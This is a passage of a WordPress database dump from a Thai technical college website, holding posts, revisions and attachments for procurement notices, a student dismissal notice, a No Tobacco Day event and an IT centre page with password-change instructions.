(2923, 1, '2018-06-04 17:29:53', '2018-06-04 10:29:53', '<h4><span style=\"color: #0000ff;\">ประกาศนี้มีเอกสาร 3 ฉบับ ดังนี้</span>\r\n----------------------------------------------</h4>\r\n1. <a href=\"/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">ประกาศวิทยาลัยเทคนิคระยอง เรื่องประกวดราคาซื้อครุภัณฑ์เครื่องกลึง ฯ คลิ๊กเพื่อเปิดดู</a>\r\n2. <a href=\"/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) คลิ๊กเพื่อเปิดดู</a>\r\n3. <a href=\"/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">คุณลักษณะครุภัณฑ์ คลิ๊กเพื่อเปิดดู</a>', 'ประกวดราคาซื้อครุภัณฑ์เครื่องกลึงขนาดยันศูนย์เหนือแท่น 165 มม. พร้อมอุปกรณ์ จำนวน 2 ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '2916-revision-v1', '', '', '2018-06-04 17:29:53', '2018-06-04 10:29:53', '', 2916, 'http://www.technicrayong.ac.th/2916-revision-v1/', 0, 'revision', '', 0),
(2924, 1, '2018-06-04 17:34:48', '2018-06-04 10:34:48', '<h4><span style=\"color: #0000ff;\">ประกาศนี้มีเอกสาร 3 ฉบับ ดังนี้</span>\r\n----------------------------------------------</h4>\r\n1. <a href=\"/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">ประกาศวิทยาลัยเทคนิคระยอง เรื่องประกวดราคาซื้อครุภัณฑ์เครื่องกลึง ฯ คลิ๊กเพื่อเปิดดู</a>\r\n2. <a href=\"/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) คลิ๊กเพื่อเปิดดู</a>\r\n3. <a href=\"/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">คุณลักษณะครุภัณฑ์ คลิ๊กเพื่อเปิดดู</a>', 'ประกวดราคาซื้อครุภัณฑ์เครื่องกลึงขนาดยันศูนย์เหนือแท่น 165 มม. พร้อมอุปกรณ์ จำนวน 2 ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '2916-autosave-v1', '', '', '2018-06-04 17:34:48', '2018-06-04 10:34:48', '', 2916, 'http://www.technicrayong.ac.th/2916-autosave-v1/', 0, 'revision', '', 0),
(2925, 1, '2018-06-04 17:33:53', '2018-06-04 10:33:53', '<h4><span style=\"color: #0000ff;\">ประกาศนี้มีเอกสาร 3 ฉบับ ดังนี้</span>\r\n----------------------------------------------</h4>\r\n1. <a href=\"/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">ประกาศวิทยาลัยเทคนิคระยอง เรื่องประกวดราคาซื้อครุภัณฑ์เครื่องกลึง ฯ คลิ๊กเพื่อเปิดดู</a>\r\n2. <a href=\"/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) คลิ๊กเพื่อเปิดดู</a>\r\n3. <a href=\"/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">คุณลักษณะครุภัณฑ์ คลิ๊กเพื่อเปิดดู</a>', 'ประกวดราคาซื้อครุภัณฑ์เครื่องกลึงขนาดยันศูนย์เหนือแท่น 165 มม. พร้อมอุปกรณ์ จำนวน 2 ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '2916-revision-v1', '', '', '2018-06-04 17:33:53', '2018-06-04 10:33:53', '', 2916, 'http://www.technicrayong.ac.th/2916-revision-v1/', 0, 'revision', '', 0),
(2927, 3, '2018-06-06 16:17:56', '2018-06-06 09:17:56', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F201806061541.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดพื้นความรู้และคุณสมบัติ ประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8-2', '', '', '2018-06-06 16:17:56', '2018-06-06 09:17:56', '', 0, 'http://www.technicrayong.ac.th/?p=2927', 398, 'post', '', 0),
(2928, 3, '2018-06-06 16:15:35', '2018-06-06 09:15:35', '', '201806061541', '', 'inherit', 'closed', 'closed', '', '201806061541', '', '', '2018-06-06 16:15:35', '2018-06-06 09:15:35', '', 2927, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/201806061541.pdf', 0, 'attachment', 'application/pdf', 0),
(2929, 3, '2018-06-06 16:16:00', '2018-06-06 09:16:00', '', '201806061541', '', 'inherit', 'closed', 'closed', '', '201806061541-2', '', '', '2018-06-06 16:16:00', '2018-06-06 09:16:00', '', 2927, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/201806061541-1.pdf', 0, 'attachment', 'application/pdf', 0),
(2930, 3, '2018-06-06 16:17:56', '2018-06-06 09:17:56', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F201806061541.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดพื้นความรู้และคุณสมบัติ ประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '2927-revision-v1', '', '', '2018-06-06 16:17:56', '2018-06-06 09:17:56', '', 2927, 'http://www.technicrayong.ac.th/2927-revision-v1/', 0, 'revision', '', 0),
(2931, 3, '2018-06-06 16:18:10', '2018-06-06 09:18:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F201806061541.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดพื้นความรู้และคุณสมบัติ ประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '2927-autosave-v1', '', '', '2018-06-06 16:18:10', '2018-06-06 09:18:10', '', 2927, 'http://www.technicrayong.ac.th/2927-autosave-v1/', 0, 'revision', '', 0),
(2933, 3, '2018-06-07 13:34:56', '2018-06-07 06:34:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D592729277769931%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมเผาบุหรี่ เนื่องในวันงดสูบบุหรี่โลก (World No Tobacco Day) ในวันศุกร์ที่ 1 มิถุนายน 2561 ที่ผ่านมา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%9c%e0%b8%b2%e0%b8%9a%e0%b8%b8%e0%b8%ab%e0%b8%a3%e0%b8%b5%e0%b9%88-%e0%b9%80%e0%b8%99%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87', '', '', '2018-06-07 13:34:56', '2018-06-07 06:34:56', '', 0, 'http://www.technicrayong.ac.th/?p=2933', 397, 'post', '', 0),
(2934, 3, '2018-06-07 13:34:34', '2018-06-07 06:34:34', '', '34258945_592723137770545_4938090166985162752_o', '', 'inherit', 'closed', 'closed', '', '34258945_592723137770545_4938090166985162752_o', '', '', '2018-06-07 13:34:34', '2018-06-07 06:34:34', '', 2933, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/34258945_592723137770545_4938090166985162752_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2935, 3, '2018-06-07 13:34:56', '2018-06-07 06:34:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D592729277769931%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมเผาบุหรี่ เนื่องในวันงดสูบบุหรี่โลก (World No Tobacco Day) ในวันศุกร์ที่ 1 มิถุนายน 2561 ที่ผ่านมา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2933-revision-v1', '', '', '2018-06-07 13:34:56', '2018-06-07 06:34:56', '', 2933, 'http://www.technicrayong.ac.th/2933-revision-v1/', 0, 'revision', '', 0),
(2936, 3, '2018-06-07 13:35:05', '2018-06-07 06:35:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D592729277769931%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมเผาบุหรี่ เนื่องในวันงดสูบบุหรี่โลก (World No Tobacco Day) ในวันศุกร์ที่ 1 มิถุนายน 2561 ที่ผ่านมา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2933-autosave-v1', '', '', '2018-06-07 13:35:05', '2018-06-07 06:35:05', '', 2933, 'http://www.technicrayong.ac.th/2933-autosave-v1/', 0, 'revision', '', 0),
(2938, 3, '2018-06-07 15:16:45', '2018-06-07 08:16:45', '', 'ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b', '', '', '2018-06-07 15:16:45', '2018-06-07 08:16:45', '', 1710, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(2939, 3, '2018-06-07 15:17:59', '2018-06-07 08:17:59', '<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2560<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2559<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2558<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2557<--</a></span></h4>', 'ปฏิทินปฏิบัติงาน', '', 'inherit', 'closed', 'closed', '', '1710-revision-v1', '', '', '2018-06-07 15:17:59', '2018-06-07 08:17:59', '', 1710, 'http://www.technicrayong.ac.th/1710-revision-v1/', 0, 'revision', '', 0),
(2940, 3, '2018-06-07 15:26:22', '2018-06-07 08:26:22', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a3', '', '', '2018-06-07 15:26:22', '2018-06-07 08:26:22', '', 0, 'http://www.technicrayong.ac.th/?p=2940', 396, 'post', '', 0),
(2941, 3, '2018-06-07 15:25:15', '2018-06-07 08:25:15', '', 'ประกวดราคาซื้อครุภัณฑ์ 3 รายการ คอมพิวเตอร์ฯ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c-3', '', '', '2018-06-07 15:25:15', '2018-06-07 08:25:15', '', 2940, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ประกวดราคาซื้อครุภัณฑ์-3-รายการ-คอมพิวเตอร์ฯ.pdf', 0, 'attachment', 'application/pdf', 0),
(2942, 3, '2018-06-07 15:26:22', '2018-06-07 08:26:22', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '2940-revision-v1', '', '', '2018-06-07 15:26:22', '2018-06-07 08:26:22', '', 2940, 'http://www.technicrayong.ac.th/2940-revision-v1/', 0, 'revision', '', 0),
(2943, 3, '2018-06-07 15:26:32', '2018-06-07 08:26:32', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '2940-autosave-v1', '', '', '2018-06-07 15:26:32', '2018-06-07 08:26:32', '', 2940, 'http://www.technicrayong.ac.th/2940-autosave-v1/', 0, 'revision', '', 0),
(2944, 3, '2018-06-08 16:01:38', '2018-06-08 09:01:38', '', 'พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8d%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%94%e0%b9%89%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2', '', '', '2018-06-08 16:01:38', '2018-06-08 09:01:38', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 0),
(2945, 3, '2018-06-08 16:04:17', '2018-06-08 09:04:17', '', 'แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%82%e0%b8%ad%e0%b9%83%e0%b8%8a%e0%b9%89-internet-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%9a%e0%b8%b8', '', '', '2018-06-08 16:04:17', '2018-06-08 09:04:17', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2946, 3, '2018-06-08 16:06:05', '2018-06-08 09:06:05', '', 'ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%8a%e0%b9%89%e0%b8%84%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%b4%e0%b8%a7%e0%b9%80%e0%b8%95%e0%b8%ad', '', '', '2018-06-08 16:06:05', '2018-06-08 09:06:05', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(2947, 3, '2018-06-12 13:35:35', '2018-06-12 06:35:35', '<h3><span style=\"color: #0000ff;\">หมายเหตุ : </span><span style=\"color: #ff0000;\">บัญชีผู้ใช้งานที่ได้รับจากงานศูนย์ข้อมูลฯ นั้น ผู้ใช้สามารถเปลี่ยนแปลงได้ในส่วนของรหัสผ่าน เพียงอย่างเดียวเท่านั้น โดยทำตามขั้นตอนด้านล่าง ดังนี้</span></h3>\r\n<h2><span style=\"color: #0000ff;\"><strong>คลิ๊ก>> <a href=\"https://192.168.254.8:21212/\"><span style=\"color: #ff0000;\">https://192.168.254.8:21212/</span></a></strong></span><span style=\"color: #ff0000;\"> </span><span style=\"color: #0000ff;\">เพื่อเปลี่ยน Password</span></h2>\r\n<img class=\"aligncenter wp-image-2953 size-full\" src=\"/wp-content/uploads/2018/06/1.jpg\" alt=\"\" width=\"870\" height=\"501\" />\r\n\r\n<img class=\"aligncenter wp-image-2952 size-full\" src=\"/wp-content/uploads/2018/06/2.jpg\" alt=\"\" width=\"1187\" height=\"677\" /><img class=\"aligncenter wp-image-2951 size-full\" src=\"/wp-content/uploads/2018/06/3.jpg\" alt=\"\" width=\"1022\" height=\"688\" /><img class=\"aligncenter wp-image-2950 size-full\" src=\"/wp-content/uploads/2018/06/4.jpg\" alt=\"\" width=\"1135\" height=\"677\" />', 'ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b8%95%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%a5%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%99-password', '', '', '2018-12-06 10:50:16', '2018-12-06 03:50:16', '', 0, 'http://www.technicrayong.ac.th/?page_id=2947', 0, 'page', '', 0),
(2949, 3, '2018-06-12 11:43:38', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-06-12 11:43:38', '2018-06-12 04:43:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=2949', 0, 'page', '', 0),
(2950, 3, '2018-06-12 12:30:49', '2018-06-12 05:30:49', '', '4', '', 'inherit', 'closed', 'closed', '', '4', '', '', '2018-06-12 12:30:49', '2018-06-12 05:30:49', '', 2947, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/4.jpg', 0, 'attachment', 'image/jpeg', 0),
(2951, 3, '2018-06-12 12:30:54', '2018-06-12 05:30:54', '', '3', '', 'inherit', 'closed', 'closed', '', '3-3', '', '', '2018-06-12 12:30:54', '2018-06-12 05:30:54', '', 2947, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/3.jpg', 0, 'attachment', 'image/jpeg', 0),
(2952, 3, '2018-06-12 12:30:59', '2018-06-12 05:30:59', '', '2', '', 'inherit', 'closed', 'closed', '', '2-2', '', '', '2018-06-12 12:30:59', '2018-06-12 05:30:59', '', 2947, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/2.jpg', 0, 'attachment', 'image/jpeg', 0),
(2953, 3, '2018-06-12 12:31:04', '2018-06-12 05:31:04', '', '1', '', 'inherit', 'closed', 'closed', '', '1-2', '', '', '2018-06-12 12:31:04', '2018-06-12 05:31:04', '', 2947, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2954, 3, '2018-06-12 13:35:35', '2018-06-12 06:35:35', '<h3><span style=\"color: #0000ff;\">หมายเหตุ : </span><span style=\"color: #ff0000;\">บัญชีผู้ใช้งานที่ได้รับจากงานศูนย์ข้อมูลฯ นั้น ผู้ใช้สามารถเปลี่ยนแปลงได้ในส่วนของรหัสผ่าน เพียงอย่างเดียวเท่านั้น โดยทำตามขั้นตอนด้านล่าง ดังนี้</span></h3>\r\n \r\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">ขั้นตอนการเปลี่ยน Password </span></h1>\r\n \r\n<h2><span style=\"color: #0000ff;\"><strong>คลิ๊ก>> </strong></span><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://172.29.230.8:21212/\">https://172.29.230.8:21212</a> </span><span style=\"color: #0000ff;\">เพื่อเปลี่ยน Password</span></h2>\r\n<img class=\"aligncenter wp-image-2953 size-full\" src=\"/wp-content/uploads/2018/06/1.jpg\" alt=\"\" width=\"870\" height=\"501\" />\r\n\r\n<img class=\"aligncenter wp-image-2952 size-full\" src=\"/wp-content/uploads/2018/06/2.jpg\" alt=\"\" width=\"1187\" height=\"677\" /><img class=\"aligncenter wp-image-2951 size-full\" src=\"/wp-content/uploads/2018/06/3.jpg\" alt=\"\" width=\"1022\" height=\"688\" /><img class=\"aligncenter wp-image-2950 size-full\" src=\"/wp-content/uploads/2018/06/4.jpg\" alt=\"\" width=\"1135\" height=\"677\" />', 'ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต', '', 'inherit', 'closed', 'closed', '', '2947-revision-v1', '', '', '2018-06-12 13:35:35', '2018-06-12 06:35:35', '', 2947, 'http://www.technicrayong.ac.th/2947-revision-v1/', 0, 'revision', '', 0),
(2957, 3, '2018-06-12 13:39:20', '2018-06-12 06:39:20', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\">ข้อมูลนักเรียน นักศึกษา</a></span></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-12 13:39:20', '2018-06-12 06:39:20', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2958, 3, '2018-06-12 13:41:14', '2018-06-12 06:41:14', '<h3><span style=\"color: #0000ff;\">หมายเหตุ : </span><span style=\"color: #ff0000;\">บัญชีผู้ใช้งานที่ได้รับจากงานศูนย์ข้อมูลฯ นั้น ผู้ใช้สามารถเปลี่ยนแปลงได้ในส่วนของรหัสผ่าน เพียงอย่างเดียวเท่านั้น โดยทำตามขั้นตอนด้านล่าง ดังนี้</span></h3>\r\n<h2><span style=\"color: #0000ff;\"><strong>คลิ๊ก>> </strong></span><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://172.29.230.8:21212/\">https://172.29.230.8:21212</a> </span><span style=\"color: #0000ff;\">เพื่อเปลี่ยน Password</span></h2>\r\n<img class=\"aligncenter wp-image-2953 size-full\" src=\"/wp-content/uploads/2018/06/1.jpg\" alt=\"\" width=\"870\" height=\"501\" />\r\n\r\n<img class=\"aligncenter wp-image-2952 size-full\" src=\"/wp-content/uploads/2018/06/2.jpg\" alt=\"\" width=\"1187\" height=\"677\" /><img class=\"aligncenter wp-image-2951 size-full\" src=\"/wp-content/uploads/2018/06/3.jpg\" alt=\"\" width=\"1022\" height=\"688\" /><img class=\"aligncenter wp-image-2950 size-full\" 